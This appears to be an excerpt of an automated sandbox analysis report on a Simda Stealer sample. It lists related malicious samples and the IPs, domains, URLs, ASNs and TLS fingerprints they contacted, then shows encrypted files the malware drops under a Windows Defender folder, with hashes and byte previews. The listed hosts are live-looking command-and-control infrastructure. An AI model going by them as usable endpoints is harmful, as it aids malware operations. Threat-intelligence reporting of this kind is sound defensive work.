                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 2.23.209.182, 2.23.209.187, 2.23.209.183, 2.23.209.149, 2.23.209.185, 2.23.209.135, 2.23.209.133, 2.23.209.144, 2.23.209.141, 40.126.31.69, 20.190.159.68, 20.190.159.23, 40.126.31.67, 20.190.159.71, 20.190.159.0, 20.190.159.4, 20.190.159.73, 20.189.173.21, 2.23.209.148, 2.23.209.130, 2.23.209.150, 2.23.209.176, 2.23.209.140, 2.23.209.189, 2.23.209.158, 2.23.209.179
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): www.bing.com, prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • VT rate limit hit for: Z8eHwAvqAh.exe

                                                                                                                                                                                                            Simulations

                                                                                                                                                                                                            Behavior and APIs

                                                                                                                                                                                                            TimeTypeDescription
                                                                                                                                                                                                            12:25:01API Interceptor898x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                            12:25:49API Interceptor2x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                                                                            IPs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            3.94.10.34Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lygynud.com/login.php
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lymyxid.com/login.php
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • lymyxid.com/login.php
                                                                                                                                                                                                            AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/wikoehfueo
                                                                                                                                                                                                            E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/xyrpanl
                                                                                                                                                                                                            Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                            • gvijgjwkh.biz/maxlthgls
                                                                                                                                                                                                            AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ypituyqsq.biz/grbkwbsae
                                                                                                                                                                                                            SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/dpaslnrfmhydrsi
                                                                                                                                                                                                            AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • ctdtgwag.biz/dpop
                                                                                                                                                                                                            RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                            • gvijgjwkh.biz/unx
                                                                                                                                                                                                            106.15.232.163Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163:8000/dh/147287063_343064.html
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163:8000/dh/147287063_134827.html
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163:8000/dh/147287063_472994.html

                                                                                                                                                                                                            Domains

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            pupycag.comBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 18.208.156.248
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 34.174.78.212
                                                                                                                                                                                                            pupydeq.comBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 13.248.169.48
                                                                                                                                                                                                            lyvyxor.comBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245
                                                                                                                                                                                                            spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 208.100.26.245

                                                                                                                                                                                                            ASNs

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            NBS11696USWlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 64.190.63.136
                                                                                                                                                                                                            Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 64.190.63.136
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 64.190.63.136
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 64.190.63.136
                                                                                                                                                                                                            sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.110
                                                                                                                                                                                                            jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 64.190.7.239
                                                                                                                                                                                                            x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                            • 64.190.99.77
                                                                                                                                                                                                            ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.120
                                                                                                                                                                                                            powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.115
                                                                                                                                                                                                            na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 209.87.95.125
                                                                                                                                                                                                            AMAZON-AESUSBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 44.221.84.105
                                                                                                                                                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 44.210.24.233
                                                                                                                                                                                                            Attachment-914011545-004.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.144.73.197
                                                                                                                                                                                                            http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 52.2.182.50
                                                                                                                                                                                                            Payslip Notification #5800210900 11112024.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 23.22.254.206
                                                                                                                                                                                                            90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                            • 3.5.11.187
                                                                                                                                                                                                            GE AEROSPACE _WIRE REMITTANCE.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 54.167.120.151
                                                                                                                                                                                                            Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                            • 52.21.71.129
                                                                                                                                                                                                            CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdWlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 106.15.232.163
                                                                                                                                                                                                            sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 120.79.48.98
                                                                                                                                                                                                            sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                            • 8.188.166.167
                                                                                                                                                                                                            mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 47.93.221.102
                                                                                                                                                                                                            C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198
                                                                                                                                                                                                            WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            • 118.31.219.198

                                                                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19WlCVLbzNph.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            P52mX04112024145925383.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Anfrage.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3
                                                                                                                                                                                                            Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                            • 188.114.97.3
                                                                                                                                                                                                            • 99.83.170.3
                                                                                                                                                                                                            • 188.114.96.3

                                                                                                                                                                                                            Dropped Files

                                                                                                                                                                                                            No context

                                                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\galynuh.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\galyqaz.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):43073
                                                                                                                                                                                                            Entropy (8bit):7.989681857548974
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:A6eLDU7W3WFK7OWC7qILQs3VmXYouwq3WWYCqNDk9C47h3hOJCcwCw48Ii5:AD33bKWC7n73YxCY/Nw9thOkcwKVk
                                                                                                                                                                                                            MD5:AC06107DAB7307631EF7E3EE3CE4944E
                                                                                                                                                                                                            SHA1:E5EA13F735A29646DD18C62C700093F214F2AD3C
                                                                                                                                                                                                            SHA-256:2B50A2A53C50CA769D904F683A576D04BD1AE5275456E1D352180D43616D6E5B
                                                                                                                                                                                                            SHA-512:4EAF11F3351482AF07862D7BF20B1ED3B556F9D5590404720B9DDBBD5D8AFAB30C9E15D1C62F2171E14200ED58FD0B54C1351820F35740D5BB867F2674B4A6C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l....A.D.[;.b..DD...}..n.o.zL......._O....r.:...%m8s...o..e....;+.q.o`3...%"..P.(}h1.H.;....%...$).|...Y.V...:..B..X..Tsa...-.P+..?........8...R..w.q.....qV.O.+.......d.....7.Z.N..V-........i.Y..s.G./pe^......M..7..+..NI.\..l.1.d...`U..zc...7 ....!.7d.Z....Q.y.)u.o..'].v...;.....m......ah...?.......1W.Q....+<..<..|^..fT.G....t..91.*.....~V..Oq.).. ..W...3...C...iE. ^...f&..+.#.'....w.._...I...k.k.L[.:.....f.+.Y.'9wE..5.(...$.&p...V>E...s.'...m;jpJ..R....:J...f.O..c.YJ8....L...4.X.....k#.dEw..... .j}..f..A........*..IU...=..5;.c.wx}@..k..R..i.L%L....e.}.#.l1...{..x.q..9s.f'b\;...X....b.X..A:.....y.w.&.+.{.j....n.JlP&$.7.....0........B.U.r.!@.G.,.:.c.>..IOx.:..^....".v..g;...-.u...."..$....+..k......aT..`op......*.............l..+)..y.Z`.........E...M..'w..%.9...G..7R...R.7:uG...|d....X..h...e...A".....O.). v....$Q....5.....;..*lU...L.....l.M.M8..4G.SkK.........q..3O...6..]..j.........y..59uC.Y'... :.c.h..b"1q. .....bk.(..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\lyxynyx.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1230
                                                                                                                                                                                                            Entropy (8bit):7.8443466513066555
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:IZsdS4WuknSxezuQj1kZ8l9KfPqiH/+/spck4qtr/gr3Nccm1FAU2nA1:QsSuknSxez1Rg8ylAsSk4OrgWetA1
                                                                                                                                                                                                            MD5:7D8CFB9346A47669DCDCE080632DE2A6
                                                                                                                                                                                                            SHA1:3FB989F2F7D84DC1204F4DA07398163D788744B2
                                                                                                                                                                                                            SHA-256:9F2316A8A4FE0EC65F36295CDFF753E454726C7B7D5A1B05ECA797835A39AC84
                                                                                                                                                                                                            SHA-512:B522C8D54896AE1E4B9A35CAAB20A3B8125FECB21F1EDA9BC5E48E1F7BB3EE9E6AB74330CC20690340A0C95FFDC81FFA2C1BCB3ADFABA32E6FFF1AD1C98A7449
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F;D.....hw.^Z>......(..F.......M.:..K;.......Y.b\.r.r78:fp.n2..I"..u.bX.X.....>.E.sp..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^.......s..|......2.*....%.....=t=.....WV..BpM....."..........\...:...).9>.6..;R*..|........|.N>.*.$.d..aZ...R2#:\....+x.4S.^.._....p....m...&....(.t...kBF.........#.EE]....}........MH.......O........4..8%.....Y.3Rw.$.........f1..d.ZR....w.K..(. ....E.o.E......1.p.

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\pupydeq.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\puzylyp.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):59521
                                                                                                                                                                                                            Entropy (8bit):7.972507988182049
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1e:ZRukFmHy4rG5tUe
                                                                                                                                                                                                            MD5:FB1B1466D0D4BB0077A37E03C08361C5
                                                                                                                                                                                                            SHA1:5E6AB8E30AA579CB8FB974BFA39E954910F95FF6
                                                                                                                                                                                                            SHA-256:82B4AD767B0227FF25BA3B959FB210927954F2C0290ABBF7A9D8E8391763653B
                                                                                                                                                                                                            SHA-512:BB0250201472065FA426AC5AA58C23DD832F4B7B621FCCF4B7B1FA54E0F239241EFEC32D16A3A478D25CBBFDB683360C53D6AE9290A23D3D8E25EE460517F9E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.8w.!..1....j..r.^..r.....'..>....=.s.$$71...I...i.....==.7.rg~..j#.`S..y0,F..%....c...Kr).#FB...B...........H<*../.. ..>.Y......:X..G..4.j....{W.A. ........*.....6.P.Q..[).\.T...z.PK.n.P.2, ..CG..,...q..c....S.}.f..K..8...y=..+*...S.b..cAMN.a.U.q.c3.9^.hD.+..'.....-.....(t...|.....(.$.......`<..n..|A..7.W..W...u..(eX&....C8....(.'..V..O.......F...:ET;^.B..(.N*.:.a....n..........'A:..Q.!j..J.m.=.^.-=-.....*..>..bvF..K.H....8.9...g?=+..D.....9@...'ON.G'.J./....P..x.UGRWH.{8...u......jY(h..7..V.......i(..|...,..|;.e.+<;...l..I..,.Kf^....$.&.$.|7....h..6Rn..+z.~/4W(......f.P..R6.....[a.~.h.+.u.[...sO.(Fzy.;.....<...A..@..N...<. ..Z... .g.+....p.(........#....r6.. Eo....3......jIg}.....z_..)'+....p............P?..h1..x.Nk.....M...Z.......0+.Yf.+.O.M..&V...X.fofX...wt.L#.R..h...z.....,../......m'..dsn\........V..4Eq....w....7.M.~ ...d.]ij.........1..\.....:.+y..).........O.,..v..C.EH.C.cI.3.:...7=PM.6.....C .d..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\qetyhyg.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):7.626935561277827
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                            MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                            SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                            SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                            SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\qexyhuv.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):6.479691220248167
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                            MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                            SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                            SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                            SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                            C:\Program Files (x86)\Windows Defender\vofycot.com

                                                                                                                                                                                                            Download File
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):25028
